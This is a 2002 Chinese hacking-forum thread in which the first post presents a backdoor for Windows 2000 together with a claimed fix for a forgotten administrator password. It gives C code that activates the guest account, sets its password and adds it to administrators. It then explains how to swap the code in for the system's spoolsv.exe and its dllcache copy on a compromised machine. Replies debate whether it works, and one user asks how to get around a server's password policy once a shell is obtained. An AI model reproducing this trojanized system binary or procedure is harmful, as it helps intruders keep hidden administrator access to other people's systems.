一个后门&&2K忘记administrator密码的解决办法

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

一个后门&&2K忘记administrator密码的解决?..

■ 回复数：21　◆ 点击数：774

将此页发给您的朋友

作者

主题: 一个后门&&2K忘记administrator密码的解决办法 ( 页: 1 2 )

回复 | 收藏 | 打印 | 篇末

spark

级别：长老级
威望：4
经验：0
货币：723
体力：

来源：江苏
总发帖数：780
注册日期：2001-06-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵，先在涉世之初小灌了一下，现在完善一下。

1、自己用C写一个小程序spoolsv.c，代码如下
编译成spoolsv.exe

#include <stdlib.h>
void main()
{
system("net user guest my_pass /active:yes");
system("net localgroup administrators /add guest");
system("spoolsv2.exe");
}

2、copy %SystemRoot%\system32\spoolsv.exe spoolsv2.exe

3、del %SystemRoot%\system32\spoolsv.exe
del %SystemRoot%\system32\dllcache\spoolsv.exe

4、把自己写的spoolsv.exe 上传到肉鸡里面的上两个目录
即：%SystemRoot%\system32\和%SystemRoot%\system32\dllcache\

5、就这样后门就可以了，嘿嘿！经过反复实践，证明是可行的。

6、如果自己机器密码忘记了，用其他系统启动或者软盘启动，按上面的
步骤就可以了。也不用删除什么sam什么的。

7、补充一点，在操作的过程中有可能第三步不能进行，原因是spoolsv.exe
正在运行，用pskill.exe杀掉次进程再操作。
呵呵，聪明的你应该知道了，这个只是一个小小的原理，能实现的功能
可多了，比如spoolsv.exe 可以变成spoolsv3.exe 也可以，只要第一步
里面的代码做相应修改就可以了，修改第一步里面的代码还可以实现其他
不同的功能。

Good Luck!

----------------------------------------------------------
送给你我思念的手
愿它能传递我的温柔
与暖暖的问候
解开你眉间的忧
赶走你心中的愁
让所有幸福与快乐
从此在你的身旁停留

编辑　

删除　

发表于 2002-04-14.20:58:10　

IP: 已记录

愚不可及

级别：高级站友
威望：0
经验：0
货币：610
体力：

来源：吉林
总发帖数：154
注册日期：2002-02-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

相当于是把BAT命令文件转成了EXE，并用来替换了系统文件！

的确是个留后门的好方法！

----------------------------------------------------------
愚,不可及

编辑　

删除　

发表于 2002-04-14.21:50:57　

IP: 已记录

spark

级别：长老级
威望：4
经验：0
货币：723
体力：

来源：江苏
总发帖数：780
注册日期：2001-06-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由愚不可及发表:
相当于是把BAT命令文件转成了EXE，并用来替换了系统文件！

的确是个留后门的好方法！

忽忽，主要提供一种思路，
spoolsv.exe在系统中有很
特殊的作用，我想高手的话
应该直接修改spoolsv.exe
我们弱些么，就用替代的方
法了。不过替换也需要替换
得精彩一些，呵呵，把这个
spoolsv.exe做好，能实现
的功能还是多多。

编辑　

删除　

发表于 2002-04-14.22:19:00　

IP: 已记录

愚不可及

级别：高级站友
威望：0
经验：0
货币：610
体力：

来源：吉林
总发帖数：154
注册日期：2002-02-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

用LCC依样画瓢编译成功1.exe，用UEDIT查看1.EXE时能清楚地看到DOS命令，连编译器的路径都有~~~~~下次还是自己注意隐藏了比较好！呵呵！

[ 此消息由愚不可及在 2002-04-14.22:28:23 编辑过 ]

----------------------------------------------------------
愚,不可及

编辑　

删除　

发表于 2002-04-14.22:27:39　

IP: 已记录

拒绝游泳的鱼 帅哥哦

级别：中级站友
威望：0
经验：0
货币：358
体力：

来源：202.101.69.*
总发帖数：65
注册日期：2002-03-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

不错！，给我解决下面的问题

一台服务器做了相对的安全策略，意思就是你得到了一个SHELL，或者说你得到的SHELL是属于管理员组的，但是你还是无法添加管理员用户，普通用户也无法添加，相当于楚楚留香说的限制了更改密码，限制了添加用户，限制了ADMINISTRATORS组的成员数。那么现在我在密码策略里限制了这些，我测试是无法添加一个用户。所以哪位朋友如何破密码策略？在DOS命令行下，或者停止密码策略的服务，但是我好象没找到，呵呵。谁可以……

编辑　

删除　

发表于 2002-04-14.22:43:25　

IP: 已记录

d0nNy

级别：老站友
威望：0
经验：0
货币：19
体力： 0.8

来源：好像是三番市
总发帖数：381
注册日期：2002-04-12

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

先搞懂了2000的运行机制了来，再来谈程序。一点最基本的认识都没得，就在这里冒黄腔。2000有一个认证体制，没有通过这个体制的命令是没有任何意义的。

----------------------------------------------------------
┏━━━━━━━━━━━━━━━━━━━━┓
┃姓　　名：d0nNy 　　　　　　　┌───┐┃
┃出生地：香港　　　　　　　　│　照　│┃
┃持牌类型：灌水执照　　　　　　│　　　│┃
┃注：1.持此照可在任何地区灌水。│　片　│┃
┃2.此执照仅限本人使用不得转让。└───┘┃
┗━━━━━━━━━━━━━━━━━━━━┛

编辑　

删除　

发表于 2002-04-14.22:44:45　

IP: 已记录

拒绝游泳的鱼 帅哥哦

级别：中级站友
威望：0
经验：0
货币：358
体力：

来源：202.101.69.*
总发帖数：65
注册日期：2002-03-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

哎呀，说谁？我？？？

编辑　

删除　

发表于 2002-04-14.22:51:37　

IP: 已记录

d0nNy

级别：老站友
威望：0
经验：0
货币：19
体力： 0.8

来源：好像是三番市
总发帖数：381
注册日期：2002-04-12

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

这个程序的设计思想是什么，简单的98可能可以，在2000运行的程序都是需要权限的。没得权限想运行
system("net user guest my_pass /active:yes");
system("net localgroup administrators /add guest");

呵呵，好像是在做梦吧。阿嘎嘎

编辑　

删除　

发表于 2002-04-14.23:06:41　

IP: 已记录

拒绝游泳的鱼 帅哥哦

级别：中级站友
威望：0
经验：0
货币：358
体力：

来源：202.101.69.*
总发帖数：65
注册日期：2002-03-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

啊嘎嘎，哈哈……
不是说我哦
那给我回答问题啊，上面的问题，你看东西是看上面的，看下面的。不看中间的？

编辑　

删除　

发表于 2002-04-14.23:13:46　

IP: 已记录

spark

级别：长老级
威望：4
经验：0
货币：723
体力：

来源：江苏
总发帖数：780
注册日期：2001-06-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由 d0nNy 发表:
先搞懂了2000的运行机制了来，再来谈程序。一点最基本的认识都没得，就在这里冒黄腔。2000有一个认证体制，没有通过这个体制的命令是没有任何意义的。

呵呵，不知道你说得是不是我，
我只想说，你先看清楚我发帖子的题目
所谓留后门，你还没有进入别人的系统，
没有相应的权限，谈什么后门
另外：解决忘记密码的问题就不说了
发这帖子之前，我经过反复实验的！

BTW

poolsv.exe你知道是干什么的么？

编辑　

删除　

发表于 2002-04-14.23:14:48　

IP: 已记录

d0nNy

级别：老站友
威望：0
经验：0
货币：19
体力： 0.8

来源：好像是三番市
总发帖数：381
注册日期：2002-04-12

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

2K忘记administrator，

我都是看清楚了的哟，啊嘎嘎，你告诉我这个是什么目的嘛，你的程序能不能实现。阿嘎嘎

编辑　

删除　

发表于 2002-04-14.23:19:07　

IP: 已记录

拒绝游泳的鱼 帅哥哦

级别：中级站友
威望：0
经验：0
货币：358
体力：

来源：202.101.69.*
总发帖数：65
注册日期：2002-03-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

啊倒，你们在灌水！

编辑　

删除　

发表于 2002-04-14.23:38:54　

IP: 已记录

Meteor 帅哥哦

级别：高级站友
威望：1
经验：0
货币：6
体力： 0.2

来源：CyberSpace
总发帖数：138
注册日期：2001-12-14

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

If the code is compiled by 16 bit compiler like turbo C or borlandc 3.0,I don't think it will work on win 2k.By the way,using system() function will pop up a dos windows.

[ 此消息由 Meteor 在 2002-04-15.18:25:26 编辑过 ]

编辑　

删除　

发表于 2002-04-15.18:22:38　

IP: 已记录

spark

级别：长老级
威望：4
经验：0
货币：723
体力：

来源：江苏
总发帖数：780
注册日期：2001-06-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由 Meteor 发表:
If the code is compiled by 16 bit compiler like turbo C or borlandc 3.0,I don't think it will work on win 2k.By the way,using system() function will pop up a dos windows.
[ 此消息由 Meteor 在 2002-04-......

呵呵，高手就是不一样！
用tc编译的的确有问题，
自己测试的使用用的vc ++6.0
所以没有发觉这个问题。

编辑　

删除　

发表于 2002-04-15.19:23:26　

IP: 已记录

d0nNy

级别：老站友
威望：0
经验：0
货币：19
体力： 0.8

来源：好像是三番市
总发帖数：381
注册日期：2002-04-12

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

一个简单的c语言程序需要这么劳师动众，完了。 :-(

编辑　

删除　

发表于 2002-04-15.23:24:52　

IP: 已记录

阿笨猫

级别：一般站友
威望：0
经验：0
货币：193
体力：

来源：江苏
总发帖数：26
注册日期：2002-04-03

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵……说不过别人了？

既然是后门...，我总觉得思路有点乱，可能是作者没表达的清楚，或者是我愚顿。因为我没试过。

----------------------------------------------------------
abm-net.51road.com

编辑　

删除　

发表于 2002-04-16.07:55:55　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 1 票

所有时间均为: 北京时间

↑TOP [第 1 2 页]